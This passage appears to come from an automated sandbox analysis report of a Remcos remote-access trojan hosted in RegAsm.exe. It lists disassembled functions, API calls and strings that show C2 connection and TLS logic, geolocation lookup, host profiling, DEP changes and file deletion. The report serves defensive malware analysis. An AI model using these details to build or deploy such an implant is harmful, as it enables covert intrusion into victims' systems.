                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                              • API String ID: 481472006-2430845779
                                                                                              • Opcode ID: 91a9ca61b4bd8fa15ee54d5cb2b0c468836249a7ad9f69523933237cdd10b5a1
                                                                                              • Instruction ID: c71449d0853176ac06c3336b483bb21f3570e9d7b28fb8d8682e76423a61a460
                                                                                              • Opcode Fuzzy Hash: 91a9ca61b4bd8fa15ee54d5cb2b0c468836249a7ad9f69523933237cdd10b5a1
                                                                                              • Instruction Fuzzy Hash: C91151725183055BC304FB75D8558ABB3E8AB94709F50093FFA8A920D1FF7CDA88C65A
                                                                                              APIs
                                                                                              • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,?,0042AE9F,00000034,00000000,?,?), ref: 0042B1FB
                                                                                              • CryptGenRandom.ADVAPI32(00000000,?,?,?,0042AE9F,00000034,00000000,?,?), ref: 0042B210
                                                                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042AE9F,00000034,00000000,?,?), ref: 0042B222
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                              • String ID:
                                                                                              • API String ID: 1815803762-0
                                                                                              • Opcode ID: 33666291a48df33b97865c7735f96ec22d4ab982dbbf97e17dc0500a6a6ac30a
                                                                                              • Instruction ID: ae164a0b830f0c37185ea5edcc456d824eb1b24de8e49cb4941b3ca088d84150
                                                                                              • Opcode Fuzzy Hash: 33666291a48df33b97865c7735f96ec22d4ab982dbbf97e17dc0500a6a6ac30a
                                                                                              • Instruction Fuzzy Hash: 40F0E535304320FAEB311F11BC08F5B3F58EB86769F600536F215D60E0D652840186AC
                                                                                              APIs
                                                                                              • GetComputerNameExW.KERNEL32(00000001,?,0040A4C5,76230F10), ref: 00413D07
                                                                                              • GetUserNameW.ADVAPI32(?,?), ref: 00413D1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Name$ComputerUser
                                                                                              • String ID:
                                                                                              • API String ID: 4229901323-0
                                                                                              • Opcode ID: b1f2df65207455d77ad9d03485450b695ee0ae644f4d1b8632ad811ce627442e
                                                                                              • Instruction ID: a952002a6ad584f3fd3bec97d2cc9e930b8157fb69aa19e269c8ae3064c7d3f6
                                                                                              • Opcode Fuzzy Hash: b1f2df65207455d77ad9d03485450b695ee0ae644f4d1b8632ad811ce627442e
                                                                                              • Instruction Fuzzy Hash: 7501FF7590011CABCB05EBD4DC45EDEBB7CAF44309F10017AB505B7191EEB46B8D8B99
                                                                                              APIs
                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0040EF02,00467C58,004685A8,00467C58,00000000,00467C58,00000000,00467C58,5.1.3 Light), ref: 0040A7E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: 7668136720ce9beca500dd0eddb669708cdd09ed6dd5243c8b2d56bff9acd360
                                                                                              • Instruction ID: 246ef45fcc1c43f14e643255eb9989aa517e7b2afcbfdbb0636345a12660214f
                                                                                              • Opcode Fuzzy Hash: 7668136720ce9beca500dd0eddb669708cdd09ed6dd5243c8b2d56bff9acd360
                                                                                              • Instruction Fuzzy Hash: 14D05B3074011D77D51496859C0EEAA779CD702755F000166BE04D72C0D9E05E0057D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8e665746bd5c0bf0b0d6802195199d6372851c629bc290857f3118bdb54c3e49
                                                                                              • Instruction ID: 06fb409b2eb98aa264058a924fa4ce0d35fc76914ffdd7f9b1cda4f708cda101
                                                                                              • Opcode Fuzzy Hash: 8e665746bd5c0bf0b0d6802195199d6372851c629bc290857f3118bdb54c3e49
                                                                                              • Instruction Fuzzy Hash: 2422C131A082199BDF15DF68C4807FEB7B5AF44314F18416BEC55AB382DB389E85CB98

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 558 40e92f-40e977 call 4021c9 call 413e9d call 4021c9 call 4034cf call 402028 call 433426 571 40e986-40e9d2 call 402178 call 4034cf call 4021e0 call 414384 call 4016e4 call 4034cf call 410fbd 558->571 572 40e979-40e980 Sleep 558->572 587 40e9d4-40ea3e call 4034cf call 402020 call 4034cf call 402028 call 4034cf call 402020 call 4034cf call 402028 call 4034cf call 402020 call 4034cf call 402028 call 401585 571->587 588 40ea46-40eae1 call 402178 call 4034cf call 4021e0 call 414384 call 4034cf * 2 call 406ba2 call 404779 call 40209b call 402091 * 2 call 4034cf call 403f83 571->588 572->571 640 40ea43 587->640 641 40eaf1-40eaf8 588->641 642 40eae3-40eaef 588->642 640->588 643 40eafd-40eb8f call 403f1f call 402a91 call 404804 call 404779 call 402178 call 413bcc call 402091 * 2 call 4034cf call 402028 call 4034cf call 402028 call 40e8ee 641->643 642->643 670 40eb91-40ebd5 WSAGetLastError call 414e7e call 402a6d call 402178 call 413bcc call 402091 643->670 671 40ebda-40ebe8 call 401673 643->671 693 40f460-40f472 call 401c4f call 403583 670->693 676 40ec15-40ec2a call 401d6f call 40170e 671->676 677 40ebea-40ec10 call 402178 * 2 call 413bcc 671->677 676->693 694 40ec30-40ed8d call 4034cf * 2 call 402a91 call 404804 call 404779 call 404804 call 404779 call 402178 call 413bcc call 402091 * 4 call 413dcc call 40dfc6 call 403509 * 2 call 437a48 call 4034cf call 4021e0 call 402020 call 402028 * 2 call 40d18b 676->694 677->693 706 40f474-40f494 call 4034cf call 402028 call 433426 Sleep 693->706 707 40f49a-40f4a2 call 4034fa 693->707 760 40eda1-40edcb call 402028 call 40d033 694->760 761 40ed8f-40ed9c call 403f1f 694->761 706->707 707->588 767 40edd2-40f405 call 403509 call 409344 call 414209 call 4142e7 call 414155 call 4034cf GetTickCount call 414155 call 4140ad call 414155 call 41405d call 4142e7 * 5 call 40a7d3 call 4142e7 call 4047c1 call 406ae8 call 404779 call 406ae8 call 404779 * 3 call 406ae8 call 404779 call 404804 call 404779 call 404804 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 404804 call 404779 call 406ae8 call 404779 call 406ae8 call 404779 call 404804 call 404779 * 5 call 406ae8 call 404779 call 406ae8 call 404779 * 7 call 406ae8 call 4018e7 call 402091 * 50 call 4034ff call 402091 * 5 call 4034ff call 401a3c 760->767 768 40edcd-40edcf 760->768 761->760 1009 40f40a-40f45b call 403ee2 call 402178 * 2 call 413bcc call 402091 * 2 call 4034ff * 2 767->1009 768->767 1009->693
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,00000029,00000000,76230F10,00467F30), ref: 0040E980
                                                                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 0040EB91
                                                                                              • Sleep.KERNEL32(00000000,00000002), ref: 0040F494
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                              • String ID: | $%I64u$5.1.3 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $X|F$X|F$\~F$\~F$\~F$hlight$name
                                                                                              • API String ID: 524882891-1162076392
                                                                                              • Opcode ID: 68ccaa8d0cf79c1436a0189e8d3e88be9f333b1599ce4cf3acb2c98d969ec9a9
                                                                                              • Instruction ID: b6ca194f84a5d1c98b5920ce75ddcdd8fe9fcf0a86d7d700392620a7e0496257
                                                                                              • Opcode Fuzzy Hash: 68ccaa8d0cf79c1436a0189e8d3e88be9f333b1599ce4cf3acb2c98d969ec9a9
                                                                                              • Instruction Fuzzy Hash: 5D52AD71A002145ACB19F732DD66AEEB3759F90308F5041BFB60A761D2EF781F88CA59

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1026 40a1d6-40a24d call 414eed GetModuleFileNameW call 40a60c call 4021e0 * 2 call 414384 call 40a9e5 call 4034fa 1041 40a2a7-40a326 call 4034cf * 2 call 402a91 call 404804 call 40209b call 402091 * 2 call 4034cf call 402077 call 403f1f call 4087ef 1026->1041 1042 40a24f-40a253 1026->1042 1082 40a328-40a32a 1041->1082 1083 40a33f-40a346 1041->1083 1042->1041 1044 40a255-40a25b 1042->1044 1044->1041 1046 40a25d-40a2a2 call 40aa8b call 4034cf call 402028 call 40be14 call 40aa3c call 40a5f9 1044->1046 1072 40a32b-40a33c call 402091 1046->1072 1082->1072 1084 40a348 1083->1084 1085 40a34a-40a356 call 4139a6 1083->1085 1084->1085 1088 40a358-40a35a 1085->1088 1089 40a35f-40a3b5 call 4034cf call 414225 call 4064d4 call 4034ff call 4034cf * 4 call 402028 1085->1089 1088->1089 1109 40a3b7-40a3c7 call 4034cf call 402028 1089->1109 1110 40a41e-40a478 call 4034cf call 402028 call 402178 call 402028 call 40d202 call 4034cf call 402028 call 433426 1089->1110 1119 40a3ca-40a3d3 1109->1119 1144 40a47a-40a47c 1110->1144 1145 40a47e-40a480 1110->1145 1119->1119 1121 40a3d5-40a3d9 1119->1121 1121->1110 1123 40a3db-40a419 call 4034cf call 402028 call 4034cf call 402028 call 40900f call 4064d4 call 4034ff 1121->1123 1123->1110 1147 40a484-40a493 call 415128 CreateThread 1144->1147 1148 40a482 1145->1148 1149 40a495-40a4e0 call 402178 * 2 call 413bcc call 413cea call 4064d4 call 4034ff 1145->1149 1147->1149 1148->1147 1166 40a4e2-40a4e3 SetProcessDEPPolicy 1149->1166 1167 40a4e5-40a4f8 CreateThread 1149->1167 1166->1167 1168 40a506 1167->1168 1169 40a4fa-40a4fd 1167->1169 1172 40a50b-40a52f call 402178 call 402a6d call 402178 call 413bcc 1168->1172 1170 40a540-40a55b call 402028 call 40cf8c 1169->1170 1171 40a4ff-40a504 1169->1171 1182 40a561-40a598 call 414225 call 404c42 call 40d0a8 call 4034ff call 404c42 1170->1182 1183 40a5ee-40a5f8 call 4092fd call 40e92f 1170->1183 1171->1172 1191 40a534-40a53b call 402091 1172->1191 1202 40a5b1-40a5b6 DeleteFileW 1182->1202 1191->1170 1203 40a5b8-40a5e9 call 414225 call 404c42 call 40d444 call 4034ff * 2 1202->1203 1204 40a59a-40a59d 1202->1204 1203->1183 1204->1203 1205 40a59f-40a5ac Sleep call 404c42 1204->1205 1205->1202
                                                                                              APIs
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F00
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F09
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F24
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F27
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F38
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F3B
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F50
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F53
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0040A1F2), ref: 00414F64
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F67
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0040A1F2), ref: 00414F73
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F76
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040A1F2), ref: 00414F87
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F8A
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0040A1F2), ref: 00414F9B
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F9E
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0040A1F2), ref: 00414FAF
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FB2
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0040A1F2), ref: 00414FC3
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FC6
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0040A1F2), ref: 00414FD7
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FDA
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0040A1F2), ref: 00414FEB
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FEE
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0040A1F2), ref: 00414FFF
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415002
                                                                                                • Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0040A1F2), ref: 00415013
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415016
                                                                                                • Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0040A1F2), ref: 00415024
                                                                                                • Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415027
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040A1FF
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00015962,00000000,00000000,00000000), ref: 0040A493
                                                                                              • SetProcessDEPPolicy.KERNEL32(00000000,00000000), ref: 0040A4E3
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A6C0,00000000,00000000,00000000), ref: 0040A4EF
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 0040A5B2
                                                                                                • Part of subcall function 0040BE14: __EH_prolog.LIBCMT ref: 0040BE19
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0040A5A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$CreateFileThread$DeleteH_prologNamePolicyProcessSleep
                                                                                              • String ID: Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Remcos Agent initialized$Software\$User$\~F$\~F$del$del$licence$license_code.txt
                                                                                              • API String ID: 4062606258-4101538746
                                                                                              • Opcode ID: c3d4a15f8a9bdced3346377a441b2e8cec02f984c11fa757a7c64ca1e78d474d
                                                                                              • Instruction ID: bf820840e173d3e8500347ecd1b7a27ce46e39732b77903c3f998a6fae3a9d47
                                                                                              • Opcode Fuzzy Hash: c3d4a15f8a9bdced3346377a441b2e8cec02f984c11fa757a7c64ca1e78d474d
                                                                                              • Instruction Fuzzy Hash: 66A1903071430067C619BB769D57A6E269A9BC0709F10493FF6467B2C2EEBC9E09825E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1216 415a94-415a9f 1217 415b70-415b85 CreatePopupMenu AppendMenuA 1216->1217 1218 415aa5-415aaa 1216->1218 1219 415b8b 1217->1219 1220 415ab0-415ab5 1218->1220 1221 415b55-415b59 1218->1221 1223 415b8d-415b90 1219->1223 1224 415ac2-415aca 1220->1224 1225 415ab7-415ac0 1220->1225 1221->1219 1222 415b5b-415b6a Shell_NotifyIconA ExitProcess 1221->1222 1227 415b19-415b27 IsWindowVisible 1224->1227 1228 415acc-415acf 1224->1228 1226 415adc-415ae5 DefWindowProcA 1225->1226 1226->1223 1231 415b39-415b53 ShowWindow SetForegroundWindow 1227->1231 1232 415b29-415b37 ShowWindow 1227->1232 1229 415ad1-415ad7 1228->1229 1230 415aea-415b17 GetCursorPos SetForegroundWindow TrackPopupMenu 1228->1230 1229->1226 1230->1219 1231->1219 1232->1219
                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 00415ADF
                                                                                              • GetCursorPos.USER32(?), ref: 00415AEE
                                                                                              • SetForegroundWindow.USER32(?), ref: 00415AF7
                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00415B11
                                                                                              • Shell_NotifyIconA.SHELL32(00000002,00467A48), ref: 00415B62
                                                                                              • ExitProcess.KERNEL32 ref: 00415B6A
                                                                                              • CreatePopupMenu.USER32 ref: 00415B70
                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 00415B85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                              • String ID: Close
                                                                                              • API String ID: 1657328048-3535843008
                                                                                              • Opcode ID: 0546807ff0dfdb21d565875a13234ba030253c9d63a8daf62b7c3dde853b2a01
                                                                                              • Instruction ID: 69ed41baf8013df7edb6dd8303528d2548f60f9075be42ed23a298a7982cfa74
                                                                                              • Opcode Fuzzy Hash: 0546807ff0dfdb21d565875a13234ba030253c9d63a8daf62b7c3dde853b2a01
                                                                                              • Instruction Fuzzy Hash: B6213935558208EFDB055FA4ED0EEEA3F25FB45311F000175FA06905B0E7B69960EB5A

                                                                                              Control-flow Graph

                                                                                              • Rendered graph not reproduced; basic blocks 40170e-4018e4
                                                                                              APIs
                                                                                              • connect.WS2_32(?,?,?), ref: 00401726
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,004049AA,?,?,?), ref: 00401846
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,004049AA,?,?,?), ref: 00401854
                                                                                              • WSAGetLastError.WS2_32(?,?,?,004049AA,?,?,?), ref: 00401867
                                                                                                • Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                              • API String ID: 994465650-2151626615
                                                                                              • Opcode ID: 1c54c5068daf1068fefbfe2c49c732229a8d88e2a8d15b26967a20f7aac60d87
                                                                                              • Instruction ID: cc572a4a7b8cc2dd4c8a1b63f7d6ff9f2a059f33d68be0fa136a37d341ce95d8
                                                                                              • Opcode Fuzzy Hash: 1c54c5068daf1068fefbfe2c49c732229a8d88e2a8d15b26967a20f7aac60d87
                                                                                              • Instruction Fuzzy Hash: CB41E531B10201B7DB147BBA891F96D7A26AB82309B40412FEC01276D3EA7D9D1987DF

                                                                                              Control-flow Graph

                                                                                              • Rendered graph not reproduced; basic blocks 4490df-449407
                                                                                              APIs
                                                                                                • Part of subcall function 00448DAD: CreateFileW.KERNEL32(00000000,00000000,?,00449188,?,?,00000000,?,00449188,00000000,0000000C), ref: 00448DCA
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 004491F3
                                                                                              • __dosmaperr.LIBCMT ref: 004491FA
                                                                                              • GetFileType.KERNEL32(00000000), ref: 00449206
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00449210
                                                                                              • __dosmaperr.LIBCMT ref: 00449219
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00449239
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00449383
                                                                                              • GetLastError.KERNEL32 ref: 004493B5
                                                                                              • __dosmaperr.LIBCMT ref: 004493BC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 8d7a2b3c8dcf4971788ba7bd61f1ef9ec662810f8d5bf56b9beabc5b2d52b55d
                                                                                              • Instruction ID: 16c0764251db30d38a12b5a8a02ae212f1302cce09ed6aaf32cd13814bbbde86
                                                                                              • Opcode Fuzzy Hash: 8d7a2b3c8dcf4971788ba7bd61f1ef9ec662810f8d5bf56b9beabc5b2d52b55d
                                                                                              • Instruction Fuzzy Hash: F2A13732A141049FEF19DF68DC527AF7BA0AB4A324F14019EF811EB391DB789C12DB59

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041597B
                                                                                                • Part of subcall function 00415A14: RegisterClassExA.USER32(00000030), ref: 00415A60
                                                                                                • Part of subcall function 00415A14: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 00415A7B
                                                                                                • Part of subcall function 00415A14: GetLastError.KERNEL32 ref: 00415A85
                                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 004159B2
                                                                                              • lstrcpynA.KERNEL32(00467A60,Remcos,00000080), ref: 004159CC
                                                                                              • Shell_NotifyIconA.SHELL32(00000000,00467A48), ref: 004159E2
                                                                                              • TranslateMessage.USER32(?), ref: 004159EE
                                                                                              • DispatchMessageA.USER32(?), ref: 004159F8
                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00415A05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                              • String ID: Remcos
                                                                                              • API String ID: 1970332568-165870891
                                                                                              • Opcode ID: 6840af3b0f868fa075757d5fdcec3e3c970199560f76d4881f8831560035f363
                                                                                              • Instruction ID: c8a284d08dd33ebe47548fa3d4bc7f9e15ad04814d582944d5373042d6cfd863
                                                                                              • Opcode Fuzzy Hash: 6840af3b0f868fa075757d5fdcec3e3c970199560f76d4881f8831560035f363
                                                                                              • Instruction Fuzzy Hash: E5018471944248EBD7109FE1ED4CEDF7BBCEB86B09F00013AF50592560EBB84545CB6A

                                                                                              Control-flow Graph

                                                                                              • Rendered graph not reproduced; basic blocks 415128-4151de
                                                                                              APIs
                                                                                              • AllocConsole.KERNEL32(00467C58), ref: 00415131
                                                                                              • GetConsoleWindow.KERNEL32 ref: 00415137
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041514A
                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4,?,?,?,?,?), ref: 00415171
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Console$Window$AllocOutputShow
                                                                                              • String ID: Remcos v$5.1.3 Light$CONOUT$
                                                                                              • API String ID: 4067487056-1171708759
                                                                                              • Opcode ID: 87430e1f32c0a6d9d60f2d4c136371f3dc9c3f062405f2ca1438f242223721d4
                                                                                              • Instruction ID: dee782cc1d132fa0a2354ebe19e16e3023016d6370a6d64ff70c1a6108a5807a
                                                                                              • Opcode Fuzzy Hash: 87430e1f32c0a6d9d60f2d4c136371f3dc9c3f062405f2ca1438f242223721d4
                                                                                              • Instruction Fuzzy Hash: 7F115B72D047006ACA11EF955C06FCBB7A99F92B01F100563FC48BF142D6E6294A86AD

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00413A88
                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 00413A9F
                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 00413AB6
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00413AF6
                                                                                              • InternetCloseHandle.WININET(?), ref: 00413AFB
                                                                                              Strings
                                                                                              • http://geoplugin.net/json.gp, xrefs: 00413A96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                                                              • String ID: http://geoplugin.net/json.gp
                                                                                              • API String ID: 3121278467-91888290
                                                                                              • Opcode ID: 03cc498f1f2dad69004204c4c8f5ce4e797067741d760ec7f35896daa75edb69
                                                                                              • Instruction ID: 67adef18b0c7e69bcd0bcbcd75fed6ea5b558425969ab8ef97af71e1a12f261e
                                                                                              • Opcode Fuzzy Hash: 03cc498f1f2dad69004204c4c8f5ce4e797067741d760ec7f35896daa75edb69
                                                                                              • Instruction Fuzzy Hash: 9E11B135A01214BBCB24ABA6CD49DEF7FBCDF06760F10007EF905B2280DAB85E40C6A4

                                                                                              Control-flow Graph

                                                                                              • Rendered graph not reproduced; basic blocks 4139a6-413a5f
                                                                                              APIs
                                                                                                • Part of subcall function 00414452: GetCurrentProcess.KERNEL32(00000001,?,00000000,0040907E,WinDir,00000000,00000000), ref: 00414463
                                                                                                • Part of subcall function 0040D033: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,00000000), ref: 0040D057
                                                                                                • Part of subcall function 0040D033: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000400), ref: 0040D074
                                                                                                • Part of subcall function 0040D033: RegCloseKey.KERNEL32(00000000), ref: 0040D07F
                                                                                              • StrToIntA.SHLWAPI(00000000,0045F27C,?,00000000,00000000,?,00467E5C,Exe,00000000,0000000E,00000000,004595AC,00000003,00000000), ref: 00413A1C
                                                                                              Memory Dump Source
